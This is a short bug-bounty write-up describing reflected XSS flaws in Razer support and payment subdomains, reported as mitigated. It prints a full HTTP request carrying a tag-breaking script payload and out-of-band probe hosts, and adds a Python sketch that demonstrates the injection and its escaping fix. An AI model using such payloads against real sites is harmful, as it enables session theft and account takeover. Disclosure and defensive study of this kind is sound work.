2 Reflected XSS In Razer

First of all, thanks for reading my first write-up on Medium.

My name is Mostafa. I work as an information security engineer, and in my spare time I do some bug hunting.

I found 2 vulnerabilities in different Razer subdomains.

The first one is a reflected XSS in (http://drivers.razersupport.com).

While searching for XSS, I looked at the reflected parameters and found that the CSRF token was reflected and commented in the HTML response. So this is the first one: I just closed the form tag and wrote an XSS payload, and it was executed.

GET /index.php?_m=k2n4qnfei8t8yk2e7ua78c7m7dd41t.burpcollaborator.net&_a=viewdownload&downloaditemid=800&nav=0Quote%3AOriginally%2C76%2C168%2C11%2C131?_m=downloads&_a=viewdownload&downloaditemid=800&nav=0Quote%3AOriginally%2C76%2C168%2C11%2C131&_m=downloads&_a=viewdownload&downloaditemid=800&nav=0Quote%3AOriginally%2C76%2C168%2C11%2C131?_m=downloads&_a=viewdownload&downloaditemid=800&nav=0Quote%3AOriginally%2C76%2C168%2C11%2C131 → →”></form><h1><script>alert(document.domain)</script></h1> HTTP/1.1
Host: drivers.razersupport.com
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: https://www.google.com/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: SWIFT_sessionid40=59cpx8mzpt0t559zefhsfxe7eykq8f.burpcollaborator.net; _gcl_au=1.1.291319320.1592845997; __utma=124197257.1459569068.1592845998.1592845998.1592845998.1; __utmc=124197257; __utmz=124197257.1592845998.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=(not%20provided); __utmt=1; __utmb=124197257.1.10.1592845998; _ga=GA1.2.1459569068.1592845998; _gid=GA1.2.741943482.1592845999; __unam=c0300f2-172dd050e1d-36a23205-2; _dc_gtm_UA-33485401-2=1
Connection: close
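
As an added illustration (not code from the original write-up or from Razer's application), the Python sketch below models a hidden form field that echoes a request value and compares raw concatenation with attribute encoding plus format validation. The function names, the field name `csrf` and the token format are assumptions; the sample value is constructed from the payload in the request above.

```python
import html
import re
from html.parser import HTMLParser

# Constructed sample input, taken from the tail of the request line above.
SAMPLE = '"></form><h1><script>alert(document.domain)</script></h1>'

# Assumed token format; a real application should use its own strict pattern.
TOKEN_RE = re.compile(r"[A-Za-z0-9]{16,64}")

def render_unsafe(token):
    """Flawed pattern: request data concatenated straight into the markup."""
    return ('<form method="post"><input type="hidden" name="csrf" value="'
            + token + '"></form>')

def render_safe(token):
    """Same template, with the value HTML-encoded for an attribute context."""
    return ('<form method="post"><input type="hidden" name="csrf" value="'
            + html.escape(token, quote=True) + '"></form>')

def is_well_formed(token):
    """Second layer: refuse anything that does not look like a token at all."""
    return TOKEN_RE.fullmatch(token) is not None

class Collector(HTMLParser):
    """Records every start tag and every value attribute the parser sees."""
    def __init__(self):
        super().__init__()
        self.tags, self.values = [], []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        self.values += [v for k, v in attrs if k == "value"]

def parse_markup(markup):
    c = Collector()
    c.feed(markup)
    c.close()
    return c.tags, c.values

if __name__ == "__main__":
    # Unencoded: the value ends early and new h1/script elements appear.
    print(parse_markup(render_unsafe(SAMPLE)))
    # Encoded: only form/input exist; the input is kept as inert data.
    print(parse_markup(render_safe(SAMPLE)))
    print(is_well_formed(SAMPLE))
```

Comparing the parsed tag lists, rather than searching the response for a literal string, is a check that can go into a regression test for any template that echoes request data.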

The second reflected XSS (auth.pay.razer.com)

Good advice: test all reflected inputs and don't use automation tools to find XSS.

All issues have been mitigated.



